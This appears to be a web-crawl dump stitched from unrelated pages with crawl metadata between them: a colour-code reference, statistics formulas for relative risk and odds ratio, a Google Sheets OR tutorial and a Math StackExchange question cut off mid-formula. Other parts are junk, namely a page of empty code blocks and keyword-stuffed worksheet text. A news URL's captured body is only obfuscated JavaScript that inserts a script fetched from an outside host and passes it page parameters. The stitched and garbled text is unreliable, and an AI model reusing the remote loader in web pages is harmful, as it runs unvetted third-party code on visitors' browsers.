alternative to your original color choice.\n\n• #e1d1df\n``#e1d1df` `rgb(225,209,223)``\n• #e1d1de\n``#e1d1de` `rgb(225,209,222)``\n• #e1d1dc\n``#e1d1dc` `rgb(225,209,220)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e1d1da\n``#e1d1da` `rgb(225,209,218)``\n• #e1d1d8\n``#e1d1d8` `rgb(225,209,216)``\n• #e1d1d7\n``#e1d1d7` `rgb(225,209,215)``\nSimilar Colors\n\n# #e1d1db Preview\n\nThis text has a font color of #e1d1db.\n\n``<span style=\"color:#e1d1db;\">Text here</span>``\n#e1d1db background color\n\nThis paragraph has a background color of #e1d1db.\n\n``<p style=\"background-color:#e1d1db;\">Content here</p>``\n#e1d1db border color\n\nThis element has a border color of #e1d1db.\n\n``<div style=\"border:1px solid #e1d1db;\">Content here</div>``\nCSS codes\n``.text {color:#e1d1db;}``\n``.background {background-color:#e1d1db;}``\n``.border {border:1px solid #e1d1db;}``\n\n# Shades and Tints of #e1d1db\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #010101 is the darkest color, while #f8f5f7 is the lightest one.\n\n• #010101\n``#010101` `rgb(1,1,1)``\n• #0d090c\n``#0d090c` `rgb(13,9,12)``\n• #191016\n``#191016` `rgb(25,16,22)``\n• #251820\n``#251820` `rgb(37,24,32)``\n• #31202b\n``#31202b` `rgb(49,32,43)``\n• #3d2835\n``#3d2835` `rgb(61,40,53)``\n• #492f3f\n``#492f3f` `rgb(73,47,63)``\n• #55374a\n``#55374a` `rgb(85,55,74)``\n• #603f54\n``#603f54` `rgb(96,63,84)``\n• #6c475e\n``#6c475e` `rgb(108,71,94)``\n• #784e69\n``#784e69` `rgb(120,78,105)``\n• #845673\n``#845673` `rgb(132,86,115)``\n• #905e7d\n``#905e7d` `rgb(144,94,125)``\n• #9b6687\n``#9b6687` `rgb(155,102,135)``\n• #a37291\n``#a37291` `rgb(163,114,145)``\n• #ab7e9a\n``#ab7e9a` `rgb(171,126,154)``\n• #b38aa3\n``#b38aa3` `rgb(179,138,163)``\n``#ba96ad` `rgb(186,150,173)``\n• #c2a2b6\n``#c2a2b6` `rgb(194,162,182)``\n``#caadbf` `rgb(202,173,191)``\n• #d2b9c8\n``#d2b9c8` `rgb(210,185,200)``\n• #d9c5d2\n``#d9c5d2` `rgb(217,197,210)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e9dde4\n``#e9dde4` `rgb(233,221,228)``\n• #f0e9ee\n``#f0e9ee` `rgb(240,233,238)``\n• #f8f5f7\n``#f8f5f7` `rgb(248,245,247)``\nTint Color Variation\n\n# Tones of #e1d1db\n\nA tone is produced by adding gray to any pure hue. In this case, #dbd7da is the less saturated color, while #feb4e2 is the most saturated one.\n\n• #dbd7da\n``#dbd7da` `rgb(219,215,218)``\n• #ded4da\n``#ded4da` `rgb(222,212,218)``\n• #e1d1db\n``#e1d1db` `rgb(225,209,219)``\n• #e4cedc\n``#e4cedc` `rgb(228,206,220)``\n• #e7cbdc\n``#e7cbdc` `rgb(231,203,220)``\n• #eac8dd\n``#eac8dd` `rgb(234,200,221)``\n• #edc5de\n``#edc5de` `rgb(237,197,222)``\n• #f0c2df\n``#f0c2df` `rgb(240,194,223)``\n• #f3bfdf\n``#f3bfdf` `rgb(243,191,223)``\n• #f5bde0\n``#f5bde0` `rgb(245,189,224)``\n• #f8bae1\n``#f8bae1` `rgb(248,186,225)``\n• #fbb7e2\n``#fbb7e2` `rgb(251,183,226)``\n• #feb4e2\n``#feb4e2` `rgb(254,180,226)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #e1d1db is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.538335,"math_prob":0.63851315,"size":3715,"snap":"2021-21-2021-25","text_gpt3_token_len":1714,"char_repetition_ratio":0.12638102,"word_repetition_ratio":0.011090573,"special_character_ratio":0.52328396,"punctuation_ratio":0.23608018,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97621083,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-18T02:16:37Z\",\"WARC-Record-ID\":\"<urn:uuid:465a8ab4-cdf8-466e-a530-400d78ce22a4>\",\"Content-Length\":\"36348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:798d2cad-8389-40e7-bbd5-dcbeabac0ff9>\",\"WARC-Concurrent-To\":\"<urn:uuid:a2f20b45-33fd-49e7-a3e1-e700f93f60a8>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/e1d1db\",\"WARC-Payload-Digest\":\"sha1:J3GWXJSHYSNYSAUDWIJOFGRPNHFIWOAO\",\"WARC-Block-Digest\":\"sha1:XCNU4H6QDZY3E6V5DUNCHPIEI46VYIC4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991650.73_warc_CC-MAIN-20210518002309-20210518032309-00401.warc.gz\"}"}
https://www.jpost.com/international/eu-threatens-germany-over-refusal-to-publish-farm-aid-recipients
[ "(function (a, d, o, r, i, c, u, p, w, m) { m = d.getElementsByTagName(o), a[c] = a[c] || {}, a[c].trigger = a[c].trigger || function () { (a[c].trigger.arg = a[c].trigger.arg || []).push(arguments)}, a[c].on = a[c].on || function () {(a[c].on.arg = a[c].on.arg || []).push(arguments)}, a[c].off = a[c].off || function () {(a[c].off.arg = a[c].off.arg || []).push(arguments) }, w = d.createElement(o), w.id = i, w.src = r, w.async = 1, w.setAttribute(p, u), m.parentNode.insertBefore(w, m), w = null} )(window, document, \"script\", \"https://95662602.adoric-om.com/adoric.js\", \"Adoric_Script\", \"adoric\",\"9cc40a7455aa779b8031bd738f77ccf1\", \"data-key\");\nvar domain=window.location.hostname; var params_totm = \"\"; (new URLSearchParams(window.location.search)).forEach(function(value, key) {if (key.startsWith('totm')) { params_totm = params_totm +\"&\"+key.replace('totm','')+\"=\"+value}}); var rand=Math.floor(10*Math.random()); var script=document.createElement(\"script\"); script.src=`https://stag-core.tfla.xyz/pre_onetag?pub_id=34&domain=\\${domain}&rand=\\${rand}&min_ugl=0\\${params_totm}`; document.head.append(script);" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92609805,"math_prob":0.96919554,"size":943,"snap":"2023-40-2023-50","text_gpt3_token_len":195,"char_repetition_ratio":0.10117146,"word_repetition_ratio":0.0,"special_character_ratio":0.20148462,"punctuation_ratio":0.07100592,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9789482,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T20:01:35Z\",\"WARC-Record-ID\":\"<urn:uuid:67dff980-828d-4586-af57-6948caabd735>\",\"Content-Length\":\"80128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:33d70320-f14e-4ade-9cdf-7f5bce3ae03c>\",\"WARC-Concurrent-To\":\"<urn:uuid:62974cdf-7725-4eae-9e8e-625d53c9ff74>\",\"WARC-IP-Address\":\"159.60.130.79\",\"WARC-Target-URI\":\"https://www.jpost.com/international/eu-threatens-germany-over-refusal-to-publish-farm-aid-recipients\",\"WARC-Payload-Digest\":\"sha1:GZT3R65QZLQRD7UP2LGJH2LVUCC4T2TK\",\"WARC-Block-Digest\":\"sha1:CXIQTPY252ISH4REBMC34X2EJUP6BI53\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510085.26_warc_CC-MAIN-20230925183615-20230925213615-00398.warc.gz\"}"}
https://www.medcalc.org/manual/relative-risk-odds-ratio.php
[ "MedCalc", null, "", null, "# Relative risk, Risk difference and Odds ratio\n\nWhen the data to be analyzed consist of counts in a cross-classification of two groups (or conditions) and two outcomes, the data can be represented in a fourfold table as follows:\n\nGroup 1Group 2Total\nNumber with positive outcomeaca+c\nNumber with negative outcomebdb+d\nTotala+bc+da+b+c+d\n\nSeveral statistics can be calculated such as relative risk and risk difference, relevant in prospective studies, and odds ratio, relevant in retrospective case controls studies.\n\n## How to calculate Relative Risk\n\nThe relative risk (RR), its standard error and 95% confidence interval are calculated as follows (Altman, 1991).\n\nThe relative risk or risk ratio is given by", null, "$$RR = \\frac {a/(a+b) } { c/(c+d) }$$\n\nwith the standard error of the log relative risk being", null, "$$\\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(RR\\right) \\right \\} = \\sqrt { \\frac {1}{a} + \\frac {1}{c} - \\frac {1}{a+b} - \\frac {1}{c+d} }$$\n\nand 95% confidence interval", null, "$$\\operatorname{95\\%\\text{ } CI} = \\operatorname{exp} \\Big( \\text{ } \\operatorname{ln}\\left(RR\\right) - 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(RR\\right) \\right \\} \\text{ } \\Big) \\quad \\text{ to }\\quad \\operatorname{exp} \\Big(\\text{ } \\operatorname{ln}\\left(RR\\right) + 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(RR\\right) \\right \\} \\text{ }\\Big)$$\n\n## Risk difference\n\nThe risk difference (RD) and its 95% confidence interval are calculated according to Newcombe & Altman (2000)", null, "$$RD = \\frac {a} {a+b} - \\frac {c} {c+d}$$\n\nThe recommended method for the calculation of the risk difference, which is a difference between proportions, requires the calculation of the confidence intervals of the two proportions separately. MedCalc calculates exact binomial confidence intervals for proportions (Armitage et al., 2002). With l1 to u1 being the 95% CI of the first proportion p1 and l2 to u2 being the 95% CI of the second proportion p2, the 95% confidence interval for the difference is given by", null, "$$\\operatorname{95\\%\\text{ } CI} = RD - \\sqrt { (p_1-l_1)^2 + (u_2-p_2)^2 } \\quad \\text{ to }\\quad RD + \\sqrt { (p_2-l_2)^2 + (u_1-p_1)^2}$$\n\nIn the context of meta-analysis, the standard error and 95% confidence interval are calculated according to Deeks & Higgins (2010), where the standard error is defined as", null, "$$\\operatorname{SE} \\left \\{ RD \\right \\} = \\sqrt { \\frac {a \\times b}{ \\left ( a+b \\right )^3} + \\frac {c\\times d}{\\left (c+d\\right )^3} }$$\n\nand 95% confidence interval", null, "$$\\operatorname{95\\%\\text{ } CI} = RD - 1.96 \\times \\operatorname{SE} \\left \\{ RD \\right \\} \\quad \\text{ to }\\quad RD + 1.96 \\times \\operatorname{SE} \\left \\{ RD \\right \\}$$\n\n## How to calculate Odds Ratio\n\nThe odds ratio (OR), its standard error and 95% confidence interval are calculated as follows (Altman, 1991).\n\nThe formula for odds ratio is:", null, "\\begin{align} OR & = \\frac {a/b} {c/d} \\\\ & = \\frac {a \\times d } { b \\times c} \\end{align}\n\nwith the standard error of the log odds ratio being", null, "$$\\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(OR\\right) \\right \\} = \\sqrt { \\frac {1}{a} + \\frac {1}{b} + \\frac {1}{c} + \\frac {1}{d} }$$\n\nand 95% confidence interval", null, "$$\\operatorname{95\\%\\text{ } CI} = \\operatorname{exp} \\Big( \\text{ } \\operatorname{ln}\\left(OR\\right) - 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(OR\\right) \\right \\} \\text{ }\\Big) \\quad \\text{ to }\\quad \\operatorname{exp} \\Big(\\text{ } \\operatorname{ln}\\left(OR\\right) + 1.96 \\times \\operatorname{SE} \\left \\{ \\operatorname{ln}\\left(OR\\right) \\right \\} \\text{ }\\Big)$$\n\n## Notes\n\nWhere zeros cause problems with computation of effects or standard errors, 0.5 is added to all cells (a, b, c, d) (Pagano & Gauvreau, 2000; Deeks & Higgins, 2010).\n\nIn meta-analysis for relative risk and odds ratio, studies where a=c=0 or b=d=0 are excluded from the analysis (Higgins & Thomas, 2021).\n\n## Statistics with Confidence: Confidence Intervals and Statistical GuidelinesAltman DG, Machin D, Bryant TN, Gardner MJ (Eds)\n\nBuy from Amazon US - CA - UK - DE - FR - ES - IT\n\nThis introduction to confidence intervals has been updated and expanded to include methods for using confidence intervals, with illustrative worked examples and extensive guidelines and checklists to help the novice. There are six new chapters on areas such as diagnostic studies and meta-analyses." ]
[ null, "https://www.medcalc.org/gif/wait20trans.gif", null, "https://www.medcalc.org/svg/hamburger_icon.svg", null, "https://www.medcalc.org/manual/formula/relativerisk.png", null, "https://www.medcalc.org/manual/formula/relativerisk_se.png", null, "https://www.medcalc.org/manual/formula/relativerisk_ci.png", null, "https://www.medcalc.org/manual/formula/riskdifference.png", null, "https://www.medcalc.org/manual/formula/riskdifference_ci2.png", null, "https://www.medcalc.org/manual/formula/riskdifference_se.png", null, "https://www.medcalc.org/manual/formula/riskdifference_ci.png", null, "https://www.medcalc.org/manual/formula/odds-ratio-formula.png", null, "https://www.medcalc.org/manual/formula/oddsratio_se.png", null, "https://www.medcalc.org/manual/formula/oddsratio_ci.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8350114,"math_prob":0.9980131,"size":3437,"snap":"2021-43-2021-49","text_gpt3_token_len":834,"char_repetition_ratio":0.14389746,"word_repetition_ratio":0.09514926,"special_character_ratio":0.24003491,"punctuation_ratio":0.12619808,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999099,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,null,null,3,null,3,null,3,null,2,null,2,null,2,null,2,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-09T01:44:27Z\",\"WARC-Record-ID\":\"<urn:uuid:03910abc-d31c-4662-907f-e3d592dd6530>\",\"Content-Length\":\"37580\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e9759bd-896a-43db-bc0d-b6d816399580>\",\"WARC-Concurrent-To\":\"<urn:uuid:f4b8497e-555a-4910-9b0e-0f469e90b11c>\",\"WARC-IP-Address\":\"104.26.2.186\",\"WARC-Target-URI\":\"https://www.medcalc.org/manual/relative-risk-odds-ratio.php\",\"WARC-Payload-Digest\":\"sha1:DMBNT5ENUHIHD6LX6OPOTK775IB6M6EA\",\"WARC-Block-Digest\":\"sha1:5CPDCNHCW5F45EZUPLGKHA6UNNSLYXHQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363641.20_warc_CC-MAIN-20211209000407-20211209030407-00627.warc.gz\"}"}
http://jfywlkj.com/fenghuangcaipiao/NStpnjLUUIcnHIEXUIkOKS4.fenghuangcaipiaopingtai
[ "```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`\n\n```\n\n```\n`\t`" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9484685,"math_prob":0.99257743,"size":937,"snap":"2019-26-2019-30","text_gpt3_token_len":939,"char_repetition_ratio":0.075026795,"word_repetition_ratio":0.096551724,"special_character_ratio":0.2828175,"punctuation_ratio":0.24365482,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9929877,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-16T20:00:47Z\",\"WARC-Record-ID\":\"<urn:uuid:9e49d233-38b3-42ca-a050-757f2e2f46a6>\",\"Content-Length\":\"143463\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:24aab5fb-8f40-4210-baaf-f702dc2f02a6>\",\"WARC-Concurrent-To\":\"<urn:uuid:6d099b85-f323-4726-90eb-3bb311fa0d72>\",\"WARC-IP-Address\":\"156.234.164.5\",\"WARC-Target-URI\":\"http://jfywlkj.com/fenghuangcaipiao/NStpnjLUUIcnHIEXUIkOKS4.fenghuangcaipiaopingtai\",\"WARC-Payload-Digest\":\"sha1:NO6TDMIEEHGELH63O3A7P2NXJBEGFEC3\",\"WARC-Block-Digest\":\"sha1:JBSEI7TIXFFUMT7EFGILN5LZDFWKSZIS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998291.9_warc_CC-MAIN-20190616182800-20190616204800-00228.warc.gz\"}"}
http://desistreem.info/third-grade-measurement-worksheets/mass-worksheets-4th-grade-measurement-third-first-and-printables/
[ "Mass Worksheets 4th Grade Measurement Third First And Printables", null, "mass worksheets 4th grade measurement third first and printables.\n\n4th grade angle measurement worksheets math 3 science 2 geometry and,math worksheets grade 3 measurement 3rd for inches 4th measuring angles 2nd common core,grade 2 measurement worksheets pdf liquid volume cm geometry and,first grade nonstandard measurement worksheets 2nd non standard for the best image common core math,measurement worksheets grade 2 centimeters and data converting length 2nd non standard 4th,3rd grade science measurement worksheets measuring inches converting length measurements between metric 4th common core,2nd grade measurement worksheets word problems pdf and data,4th grade measurement word problems worksheets 2 common core second and printables unique third math,3rd grade measurement and geometry worksheets 2 free 3 pdf,grade 2 measurement worksheets cm mass 3rd and geometry 4th." ]
[ null, "http://desistreem.info/wp-content/uploads/2019/10/mass-worksheets-4th-grade-measurement-third-first-and-printables.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87197286,"math_prob":0.9477709,"size":973,"snap":"2019-43-2019-47","text_gpt3_token_len":200,"char_repetition_ratio":0.27038184,"word_repetition_ratio":0.0,"special_character_ratio":0.17882836,"punctuation_ratio":0.070063695,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9892229,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T23:13:16Z\",\"WARC-Record-ID\":\"<urn:uuid:3b414331-a95b-44f6-8674-cf1bf3c11e51>\",\"Content-Length\":\"46140\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dc01c244-46bd-4118-91e2-9d2550f117bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:6ca801f6-a856-485d-86f6-cb5fe3c893b0>\",\"WARC-IP-Address\":\"104.28.25.168\",\"WARC-Target-URI\":\"http://desistreem.info/third-grade-measurement-worksheets/mass-worksheets-4th-grade-measurement-third-first-and-printables/\",\"WARC-Payload-Digest\":\"sha1:TFGCK5NRQOS67NFWIVVLKK2SBT7TJ5TE\",\"WARC-Block-Digest\":\"sha1:OSK2LCB7DENSYS2G7DOSFJZDV2NU5BC4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986677230.18_warc_CC-MAIN-20191017222820-20191018010320-00121.warc.gz\"}"}
https://solvergeek.com/or-function-in-excel/
[ "July 31, 2021\n\n# OR function in Google Sheet\n\nIn this lesson we will learn how the OR function works in Google Sheet. The OR function is used when you want to check multiple conditions. It returns TRUE if any one of the conditions evaluate to TRUE, else it returns FALSE (Note: it returns FALSE even if one condition is FALSE).\n\n`=OR(logical1, [logical2],…)`\n• logical1 – This is the first condition, you want to evaluate for TRUE or FALSE.\n• [logical2] – Second and rest conditions are optional, that you want to evaluate for TRUE or FALSE.\n\nLet’s understand with a simple example. In below table Price has been mentioned as 5 in cell A2 and 55 in cell A3. We have used OR function in cell B2 with 2 conditions as follows.\n\n`=OR(A2>10,A3<30)`\n• The first condition returns FALSE as A2=5 and 5 is not greater than 10.\n• The second condition also returns FALSE as A3=55 and 55 is not less than 30.\n\nHence the result of OR function is FALSE.", null, "In below example Price has been mentioned as 35 in cell A2. We have used OR function in cell B2 with 2 conditions as follows.\n\n`=OR(A2>10,A2<30)`\n• The first condition returns TRUE as 35 is greater than 10.\n• The second condition returns FALSE as 35 is not less than 30.\n\nHence the result of OR function is TRUE.", null, "#### Notes :\n\n• OR function can be used with other formulas like, in an IF Function, we can test a condition and then specify a value when it’s TRUE and a value when it is FALSE. Using OR function within IF enables users to check multiple conditions at one go.\n• For example, if you have to test whether A1 is greater than 20 or A2 is less than 200, here is how you can do it in an IF function:\n=IF(OR(A1>20,A2<200),”Approve”,”Reject”)\n• The arguments must either evaluate to logical values (TRUE/FALSE), or must be arrays/references of logical values.\n• Maximum of 255 conditions can be tested in a single OR function.\n• If the specified range contains no logical value, the OR function returns #VALUE! error.\n• Text & empty cells are ignored.\n\nYou can check here to know how the OR function works in Excel.\n\nYou can check here to understand how the AND function works in Excel.\n\nYou can check here to understand how the AND function works in Google Sheet.\n\nYou can check here to understand how the NOT function works in Google Sheet.\n\nYou can check here to understand how the NOT function works in Excel.", null, "#### abhraisraja\n\nView all posts by abhraisraja →" ]
[ null, "https://cdn.shortpixel.ai/client/q_glossy,ret_img,w_277,h_114/http://solvergeek.com/wp-content/uploads/2020/03/OR-function-in-Google-Sheet-1.png", null, "https://cdn.shortpixel.ai/client/q_glossy,ret_img,w_278,h_107/http://solvergeek.com/wp-content/uploads/2020/03/OR-function-in-Google-Sheet-2.png", null, "https://secure.gravatar.com/avatar/e912ab4f48cc631ddccdd35a3fc99b5e", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85960394,"math_prob":0.94941646,"size":2423,"snap":"2021-31-2021-39","text_gpt3_token_len":594,"char_repetition_ratio":0.15832989,"word_repetition_ratio":0.35555556,"special_character_ratio":0.26042098,"punctuation_ratio":0.09803922,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934924,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-31T09:18:19Z\",\"WARC-Record-ID\":\"<urn:uuid:d0c334b4-b37b-4432-a6db-a79268fd9bcb>\",\"Content-Length\":\"22589\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1e9f59fa-8222-463b-a8d5-105a183c2f62>\",\"WARC-Concurrent-To\":\"<urn:uuid:a2b9572f-2429-4d6d-8e27-a893e5b9633a>\",\"WARC-IP-Address\":\"141.136.41.144\",\"WARC-Target-URI\":\"https://solvergeek.com/or-function-in-excel/\",\"WARC-Payload-Digest\":\"sha1:LRPPZA74RVOJPR7PTOXXTU3L2UHSB22X\",\"WARC-Block-Digest\":\"sha1:DAK5CWOOFCLD2V5SSYLTLVER3N2OZEZV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154085.58_warc_CC-MAIN-20210731074335-20210731104335-00496.warc.gz\"}"}
https://math.stackexchange.com/questions/3118306/action-of-a-1-form-on-the-push-forward-and-pull-back-of-a-vector
[ "Action of a 1-form on the push-forward and pull-back of a vector\n\nI am studying differential geometry I am trying to proof the expression below.\n\nGiven that for a map $$\\phi$$ : $$M$$ $$\\to$$ $$M$$ the pull-back $$\\phi$$*$$\\omega$$ $$\\in$$ $$T^\\ast_p M$$ of a 1-form $$\\omega$$ $$\\in$$ $$T^\\ast_p M$$ is defined by :\n\n($$\\phi$$*$$\\omega$$)$$(v)$$ = $$\\omega$$($$\\phi_{*}v$$) where $$v$$ $$\\in$$ $$T_{p}M$$.\n\nHow would we proof this in a coordinate basis $$dx^{\\mu}_{p}$$, $$\\phi^{*}\\omega$$ has components:\n\n$$(\\phi^{*}\\omega)_{\\nu} = \\frac{\\partial x^{'\\mu}}{\\partial x^{v}}\\omega_{\\mu}$$\n\nwhere $$\\mathbf{\\omega} = \\omega_{\\mu}dx^{\\mu}_{\\phi(p)}$$ and $$x^{'\\mu} = x^{\\mu} \\bullet \\phi$$.\n\nand also prove that if $$\\phi$$ is a diffeomorphism, then the push-forward is $$\\phi$$*$$\\omega$$ $$\\in$$ $$T^{\\ast}_{\\phi(p)} M$$ of a 1-form $$\\omega$$ $$\\in$$ $$T^{\\ast}_{p} M$$ is defined by:\n\n$$(\\phi_{*}\\omega)(v) = \\omega(\\phi^{*}v)$$ for any $$v \\in T^{\\ast}_{\\phi(p)} M$$. Prove that in the coordinate basis $$dx^{\\mu}_{\\phi(p)}, \\phi_{*}\\omega$$ has components :\n\n$$(\\phi_{*}\\omega)_{\\nu} = \\frac{\\partial x^{\\mu}}{\\partial x^{'v}}\\omega_{\\mu}$$.\n\nTo clarify things please find the extract of the notes I am reading:[extract]\n\nmigrated from physics.stackexchange.comFeb 19 at 0:35\n\nThis question came from our site for active researchers, academics and students of physics.\n\n• Might Mathematics be better suited for this math question? – Kyle Kanos Feb 18 at 12:10\n• please do not cross-post questions, it is considered an abuse of the SE sites and is looked down upon. Just choose one site and if it doesn't get an answer after ~1 week, try at a different site. – Kyle Kanos Feb 18 at 12:44\n• Math mods: Please merge. – Qmechanic Feb 19 at 0:35\n\nI'm not sure what you mean by \"proof\" of a definition. Note that you can't really \"push forward\" a form. You can only push forward a vector at point $$p$$. Your book's \"push forward\" $$\\phi_*$$ of a form is really the pull-back of the form along the inverse map $$\\phi^{-1}$$.\n\nIf $$\\phi: M\\to N$$ takes $$x\\mapsto z(x)$$ then, by definition, the pushforward in coordinate language of\n$$X= \\left.X^\\mu \\frac{\\partial}{\\partial x^\\mu}\\right\\vert_p \\in TM_p$$ is $$\\phi_* X= \\left.X^\\mu \\frac{\\partial z^\\nu}{\\partial 